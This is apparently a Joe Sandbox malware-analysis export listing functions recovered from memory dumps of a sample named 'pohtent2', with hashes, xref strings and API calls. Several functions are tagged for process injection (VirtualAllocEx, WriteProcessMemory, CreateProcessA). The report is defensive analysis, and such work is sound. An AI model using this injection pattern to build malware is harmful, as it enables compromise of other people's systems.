Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c90000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 279a65db82ddb3eac6945aead36b49f9e76a494455686242eb3c517ed0ae22b0
Instruction ID: b233bf447b718a0410176bfc14969719b0207908d1a1eda8c8d81f4a1b5b7b2f
Opcode Fuzzy Hash: 279a65db82ddb3eac6945aead36b49f9e76a494455686242eb3c517ed0ae22b0
Instruction Fuzzy Hash: 3FA1E278E04209EFDF19DFA5D458AEDBBB2FF48301F508829E45267294CB345A86CF90

Function 05F57749 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05F578C3
(bq, xrefs: 05F5786C

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: a134d784ef475d04b20dcc998f86c8bebfebc9e491c3ca96b6c0537b3ca1f765
Instruction ID: b087c61789283c1a828d6d8228254c0746dbee18ad9941c3f1208d7148260818
Opcode Fuzzy Hash: a134d784ef475d04b20dcc998f86c8bebfebc9e491c3ca96b6c0537b3ca1f765
Instruction Fuzzy Hash: BB51BD327052458FDB15AF68D854AAE7BA2FF84351F208169E9058B3A1CF78EC46CBD1

Function 05F55198 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05F5532D
(bq, xrefs: 05F5529E

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 8207d64e9b4484abfc72e8c650e9b658ba70a079a5d98385bfa1495b874ccc3a
Instruction ID: 07885327feb725b380c2e518f1b802d26b6ff53bf8ab689f4e2543c79aedc37b
Opcode Fuzzy Hash: 8207d64e9b4484abfc72e8c650e9b658ba70a079a5d98385bfa1495b874ccc3a
Instruction Fuzzy Hash: 3151BC30B002018FD719EF78D864A6E7BB3FF85211B60456CEA468B3A0DE75EC06CB91

Function 05F53038 Relevance: 2.7, Strings: 2, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05F531A4
(bq, xrefs: 05F531D0

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 1347db00f745698cd5d4fcfce1588b9744fdce73d47c98c9c1ff0f9fb74b785b
Instruction ID: 3e0c4da45f88cd2d3604c09f9b658697397199ef35122fca0ece71e0dd3d7e88
Opcode Fuzzy Hash: 1347db00f745698cd5d4fcfce1588b9744fdce73d47c98c9c1ff0f9fb74b785b
Instruction Fuzzy Hash: 5451CF31B002114FDB19EF79C85466EBBE6EFC9350B548978E906CB3A1DE74DC058B91

Function 05F8F2A8 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 05F8F3C0
h, xrefs: 05F8F3A1

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: 00408fb1a62cb25c0d3d785f572907f9d079a3ac6feaf51b6c7c0e106feeb772
Instruction ID: 4c3d9d49b4a05fa430e80380bb03e545ba0118ef5ae8402e2fbd0124989e1c4c
Opcode Fuzzy Hash: 00408fb1a62cb25c0d3d785f572907f9d079a3ac6feaf51b6c7c0e106feeb772
Instruction Fuzzy Hash: E1710875E002298FDB55EF69C850AE9BBB2BF89300F5081AAD50DBB354DB349E85CF50

Function 05F5A91B Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05F5A9B4
pbq, xrefs: 05F5AA87

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q$pbq
API String ID: 0-3872760177
Opcode ID: 4d97cfc343280ac8063fe53e157ccfe02bdfcb59f4988cb715165783aa77a0de
Instruction ID: 828ce73a0496972a4f962249e4ebd95da80c168740cd251ec1b968aaa56004a2
Opcode Fuzzy Hash: 4d97cfc343280ac8063fe53e157ccfe02bdfcb59f4988cb715165783aa77a0de
Instruction Fuzzy Hash: E541D331A402059FD705EB78C9807AFBBB7FF88300F148928C5499B369DB75E94A8791

Function 061B456F Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

2, xrefs: 061B4579
;, xrefs: 061B459F

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID: 2$;
API String ID: 0-2555240558
Opcode ID: 8a60e12d3969b96ced65566d93eb283ed0b474e1218d43bade334fdd54dd04e9
Instruction ID: e8e7e4d580bd8e732ffca2d73de5e7cf91891aa065ee2c92a960ad0636151aa0
Opcode Fuzzy Hash: 8a60e12d3969b96ced65566d93eb283ed0b474e1218d43bade334fdd54dd04e9
Instruction Fuzzy Hash: 4931FF74901228CFDBA4DF68C948BE9BBF1BB08300F10A4EAD409A7394D7745AD4CF54

Function 05F5C200 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 05F5C57B

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: e68ca94c836b5f8c107869a4ecb103fcd3149bc073e7475ef54254cc7eaa5144
Instruction ID: 88e19c51a3b3fe8a1aa976b2a88b6a6ad7fc886cedb754ba58cf36ca7e95514f
Opcode Fuzzy Hash: e68ca94c836b5f8c107869a4ecb103fcd3149bc073e7475ef54254cc7eaa5144
Instruction Fuzzy Hash: AC522B75A002288FDB25CF68C991BEDBBF2BF88310F1585D9E549AB351DA349D80CF61

Function 05F56740 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_^q, xrefs: 05F569D0

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 3fa309a0fca7053aea26a96ecd680cf795295e039dbbe6cf2023e6997af36dd4
Instruction ID: b31d3794d2ec5eefa9d3751bac703056137705d5650d9010f2991113b987356d
Opcode Fuzzy Hash: 3fa309a0fca7053aea26a96ecd680cf795295e039dbbe6cf2023e6997af36dd4
Instruction Fuzzy Hash: 02229A31A102149FDB04DFA8D494AADBBB2FF88314F548569EA16DF3A1CB75EC40CB90

Function 05F73715 Relevance: 1.7, APIs: 1, Instructions: 227processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F73987

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d97232c6bb2cee5376fc7839aaa2f2c287f701dbcacba31d8a3e8be6c51e8293
Instruction ID: f11e947b65e93f119241fa8a96626c1e10fc1b37b09a5fdf65992e73ca21617a
Opcode Fuzzy Hash: d97232c6bb2cee5376fc7839aaa2f2c287f701dbcacba31d8a3e8be6c51e8293
Instruction Fuzzy Hash: 5C9116B5D0421D9FDB10CFA9C841BEEBBF1BF09300F14956AE859A7280DB349985DF85

Function 05F73720 Relevance: 1.7, APIs: 1, Instructions: 226processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F73987

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ce8a91405cc2676a2b02c6565a618daefdc891cdecc1b58fef201fe32ff2ad8a
Instruction ID: b4973d0349843d45a4288fb98095754e0619da45c44b6e0da2bdc4d2e4e6295f
Opcode Fuzzy Hash: ce8a91405cc2676a2b02c6565a618daefdc891cdecc1b58fef201fe32ff2ad8a
Instruction Fuzzy Hash: 409116B1D0421D9FDB10CFA9C841BEEBBF1BF09300F14956AE859A7280DB749985DF85

Function 05F7630C Relevance: 1.7, APIs: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05F76493

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 23f1d74943b3b6b22f8fc581cab2d1f2c02bbedc7d60cf36c155f2d6d877ad2c
Instruction ID: 969e7c5d396486331afda2b0f34d0e9a53d30b50d25dcd4447f4ac3a22ce8565
Opcode Fuzzy Hash: 23f1d74943b3b6b22f8fc581cab2d1f2c02bbedc7d60cf36c155f2d6d877ad2c
Instruction Fuzzy Hash: 8D6113B1D0061C9FDB14CFA9C8457EDBBB1BB08314F24812AE859EB284DB789985CF81

Function 05F76318 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05F76493

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2edf32ecc305fb67f2edbc6e3ef3e32dedc7c7f9c910de8330d81c2f4be25a02
Instruction ID: b6cdafb057b6b23b38f47c8afbc6b79c6033c74682bb7045c67cd409da070f25
Opcode Fuzzy Hash: 2edf32ecc305fb67f2edbc6e3ef3e32dedc7c7f9c910de8330d81c2f4be25a02
Instruction Fuzzy Hash: 3B6104B0D0071C9FDB14CFA9C845BEDBBB1BB49314F24812AE855EB284DB789985CF85

Function 05F74578 Relevance: 1.6, APIs: 1, Instructions: 136injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F74673

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 731526a2028925b0706f72787077b20d189030b4c5020aaf36e28106e4863b58
Instruction ID: 0e28448213b369384d13ce51062dd2c46d1d4491c68ff86e01e6ae642201ecea
Opcode Fuzzy Hash: 731526a2028925b0706f72787077b20d189030b4c5020aaf36e28106e4863b58
Instruction Fuzzy Hash: 2341ECB5D052588FDF00CFA9D984ADEFBF1BB49310F14902AE814B7250D7399A45CF58

Function 05F745A0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F74673

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 34c0f8fb136258c2915cf15174e3039bbb9982cdfcdb7050298b28a4505ac293
Instruction ID: bf1831ed7c2c7953544fc1418702f722a2dff7235982f789b738512e5ff97874
Opcode Fuzzy Hash: 34c0f8fb136258c2915cf15174e3039bbb9982cdfcdb7050298b28a4505ac293
Instruction Fuzzy Hash: 0641ABB5D012589FCF00CFA9D984ADEFBF1BB49310F20942AE819B7210D739AA45CF58

Function 05F74030 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F740E2

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 07311f8d9a3cb0fa0d8170b4f698456789d3a415279cfaec7cd586e568e3f016
Instruction ID: 9e0fc58100d3cedf022e368b0821bd127063c107199e4c7a0bd8e346a777f684
Opcode Fuzzy Hash: 07311f8d9a3cb0fa0d8170b4f698456789d3a415279cfaec7cd586e568e3f016
Instruction Fuzzy Hash: B931B7B9D04258DFCF10CFA9D884AEEFBB1BB49310F10902AE815BB210D735A945CF54

Function 05F74038 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F740E2

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd3801d56829fac02dcf4eeeb08a6d93322dcf014b701694e6b239b5217e47d7
Instruction ID: 70c90181cd75b0edd7abcc0cbcbcf02723928acf820647799d59d19e8d9783a2
Opcode Fuzzy Hash: cd3801d56829fac02dcf4eeeb08a6d93322dcf014b701694e6b239b5217e47d7
Instruction Fuzzy Hash: 6231A6B9D04258DFCF10CFA9D984ADEFBB5BB49310F10942AE815BB210D735A945CF68

Function 011FFC18 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 011FFCBC

Memory Dump Source

Source File: 00000007.00000002.2423014118.00000000011F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11f0000_pohtent2.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 39da2fd099c1335b2f771f9501536072b030c941843c95c4e971265adbbcc357
Instruction ID: 70ac29d43f1c78a7e304b95ae4c45b3c35228295c53bdc6855df36a9be2fbc92
Opcode Fuzzy Hash: 39da2fd099c1335b2f771f9501536072b030c941843c95c4e971265adbbcc357
Instruction Fuzzy Hash: D631A7B9D012589FCF14CFA9D980ADEFBB0BB49310F20942AE819B7210D775A945CF98

Function 05F80040 Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

(bq, xrefs: 05F802F4

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 6b10c29574d20d61c19bc826378acfb519c548fe3691220380c374e48f60bcf6
Instruction ID: 2bedb6dbdd5e9759e530cef4264e33579eb969ecb22791b1ce4d6db13fee60e2
Opcode Fuzzy Hash: 6b10c29574d20d61c19bc826378acfb519c548fe3691220380c374e48f60bcf6
Instruction Fuzzy Hash: 2BA18E317042009FD715AB64D858B6A7BB6FF89310F1585A9E6068B3A1CF7AEC46CB81

Function 05F5B31B Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05F5B542

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 84676544a8cf8c7ac791ffcf38a17799038a78d7b4100d2133b1361cae4a4054
Instruction ID: 864770fdfd47cc6d65067eab4d7abd4a91cc5d70451db404f4297339f75d31a9
Opcode Fuzzy Hash: 84676544a8cf8c7ac791ffcf38a17799038a78d7b4100d2133b1361cae4a4054
Instruction Fuzzy Hash: 0DA1FD34A10218DFDB04DFA4D898A9DBBB2FF88310F558159E906AB365DF35EC46CB90

Function 05F51E88 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

(bq, xrefs: 05F51EFC

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 6ed2308f29c19ae94a1f1c364d03e42f227b819615beda2d02f930e0c5bbbd74
Instruction ID: eb1f068a808b8e306df24aa54526a193d2bc23e1c4fb429548a83d29f1b777d1
Opcode Fuzzy Hash: 6ed2308f29c19ae94a1f1c364d03e42f227b819615beda2d02f930e0c5bbbd74
Instruction Fuzzy Hash: 5F51C235A042168FCB10DF68D884A6AFBB5FF85320F1586A5FA559B281D734F851CBD0

Function 05F52D60 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

,bq, xrefs: 05F52DC3

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: bd06956a4391e8b92a776643f97f8da67ce5995d3f3f919bab804e551a872c86
Instruction ID: cbbeef5d699ecda17f41dd350dee36515ca4ced168301f9ea3abe707a103eded
Opcode Fuzzy Hash: bd06956a4391e8b92a776643f97f8da67ce5995d3f3f919bab804e551a872c86
Instruction Fuzzy Hash: 68516E357001118FCB05DF69D890AAEBBE6FF89321B158179EA06DB365DB35DC01CB91

Function 05F50EC8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

pbq, xrefs: 05F50F78

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 00879d88a04b9e5af0fb89e035211a01470111dd50880cf917b7c34b63849410
Instruction ID: 203f8f4072f2e0e5dbc5965493cf029f015f3164a8a71e4c6b261f553f0b52b3
Opcode Fuzzy Hash: 00879d88a04b9e5af0fb89e035211a01470111dd50880cf917b7c34b63849410
Instruction Fuzzy Hash: 5D514D76600104AFCB46AFA8C945D697FB7FF8C31071A84A4E6099F376DA36DC22DB50

Function 05F58D05 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(bq, xrefs: 05F58D2C

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: fb667fc4192c955aead4f62a02bea5ca894d4ff56e814c270eae2f9c13781f47
Instruction ID: 2cb8bec332acddc97e0c4740a2e503c6eccb934c707b39912fa41b37be392235
Opcode Fuzzy Hash: fb667fc4192c955aead4f62a02bea5ca894d4ff56e814c270eae2f9c13781f47
Instruction Fuzzy Hash: 88518035A01215CFCB14DF59C484AAEB7F2FF89360B258969D916AB395CB38F805CF90

Function 05F5EFB7 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05F5F002

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: edf31cd675718b6c075dfb99cd213d1ca8105280f6893db9b41759e68b1ebc6e
Instruction ID: e2ba398acb6a85ffa08845db82f3bab14afc6c2f3901ae92660fd91915c7af88
Opcode Fuzzy Hash: edf31cd675718b6c075dfb99cd213d1ca8105280f6893db9b41759e68b1ebc6e
Instruction Fuzzy Hash: 86419930B106148FDB14EB64C898AAE77BBEFC9710F504559E943AB394CF789C46CB91

Function 05C70E60 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05C70EFF

Memory Dump Source

Source File: 00000007.00000002.2787763115.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: true

Associated: 00000007.00000002.2776039829.0000000005B30000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5b30000_pohtent2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0555d6e9c27c45412f4bf986db8b74e411a07efaf5c4f1af3f41e8262cea22d7
Instruction ID: 52bd009e31734dba31836187a6ace818f8abe8c83c69508500422a41bff70700
Opcode Fuzzy Hash: 0555d6e9c27c45412f4bf986db8b74e411a07efaf5c4f1af3f41e8262cea22d7
Instruction Fuzzy Hash: 1D3198B8D052589FCF10CFA9D984ADEFBB1BB59310F20942AE825B7210D735A945CF98

Function 05F5A390 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05F5A3D9

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 0777df30cd8a6105d158b90d4a8ba04cb938eeff6390200b467a44244b35fc40
Instruction ID: 985e53b7e7e2832fafccf17399b720bbbc19699366436aa9f539331298f8080b
Opcode Fuzzy Hash: 0777df30cd8a6105d158b90d4a8ba04cb938eeff6390200b467a44244b35fc40
Instruction Fuzzy Hash: 3231D5727001149FDB059F94C888999BFBBFF88710F0581A4EA069B375DA32DC12CB90

Function 061B3BFF Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

3, xrefs: 061B4C6D

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 78fb4787fd4a29e2589d86d55f37e26124936b6159cc041614bdeb8d87b6a300
Instruction ID: 889d17e0b8a1eeb318ae9de2d4fa9c95e103297d01d59efb177efed768a108cc
Opcode Fuzzy Hash: 78fb4787fd4a29e2589d86d55f37e26124936b6159cc041614bdeb8d87b6a300
Instruction Fuzzy Hash: 6741E274A00568CFDBA4EF68C954BE9BBB2AB49304F1094EAD40DAB354D7349EC5CF10

Function 061B3F0F Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

, xrefs: 061B3F9F

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f3dfbcfa0786fcaa802a2b6fe5c2971802e29a8f9827f55d8d170b6c82ae341f
Instruction ID: 186148865a44f27e994a8c1b8d55706bc8ee74b7469ffe7ca6080628a9465ec3
Opcode Fuzzy Hash: f3dfbcfa0786fcaa802a2b6fe5c2971802e29a8f9827f55d8d170b6c82ae341f
Instruction Fuzzy Hash: E141C074900268CFDBA0DF68C844BEDBBB1AB49304F1094EAD40DA7394D7755AC5CF50

Function 05F55A90 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05F55ADA

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 573e1cd6d0246259b41881d21b6e953bad2ecb5c20c45dceae94c11fef809008
Instruction ID: f64aeef45f59376993b85deec98060dd00c808b67e4eadc3489f49f021a1caa4
Opcode Fuzzy Hash: 573e1cd6d0246259b41881d21b6e953bad2ecb5c20c45dceae94c11fef809008
Instruction Fuzzy Hash: FA215971704244AFCB16CF29C884AAA7BEABF8A320B1540A6FE45CB261C635DC41CB60

Function 05F55AA0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05F55ADA

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 2f210e92c9367c2a349e0c0f2d9693e996dc6e35652167f253693613aea3705e
Instruction ID: 04323bef9647f47a80bfe3cdf483a7fa93931054d66bc2afaa083c14ff34ce59
Opcode Fuzzy Hash: 2f210e92c9367c2a349e0c0f2d9693e996dc6e35652167f253693613aea3705e
Instruction Fuzzy Hash: 76217F713041489FCB15DF2AC884AAA7BEAFF8E320B158095FD45CB360CA35DC51CB60

Function 061B3B81 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

7, xrefs: 061B3B8F

Memory Dump Source

Source File: 00000007.00000002.2841669400.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_61b0000_pohtent2.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 6d43ddfce1f74758ab6d0d01592070b18f9086c52f553cd7ed37eb6b3b8f2d06
Instruction ID: 2cc63dd6704d762ddda942658b70ecd878d15b482d7c93cadfc9f8cd7046239a
Opcode Fuzzy Hash: 6d43ddfce1f74758ab6d0d01592070b18f9086c52f553cd7ed37eb6b3b8f2d06
Instruction Fuzzy Hash: 2D31EC74A01228CFEBA4DF68C948BE9BBF1BB08300F10A4EAD409B7294D7745A94CF54

Function 05C91E43 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C925F9

Memory Dump Source

Source File: 00000007.00000002.2788023388.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c90000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 128832ace30142fff776fe532169275bd1af7315951bcf7efdd1c5f9c165d7f0
Instruction ID: cbb2a2a28944172baa54a7dbb2649e079c4ad0bcc2374b375566982d971c6b8a
Opcode Fuzzy Hash: 128832ace30142fff776fe532169275bd1af7315951bcf7efdd1c5f9c165d7f0
Instruction Fuzzy Hash: 33211674D0420ADFEF18CFAAD4596FEBBB2FB85311F04882AD151A7240CB345A81CF91

Function 05F52D53 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

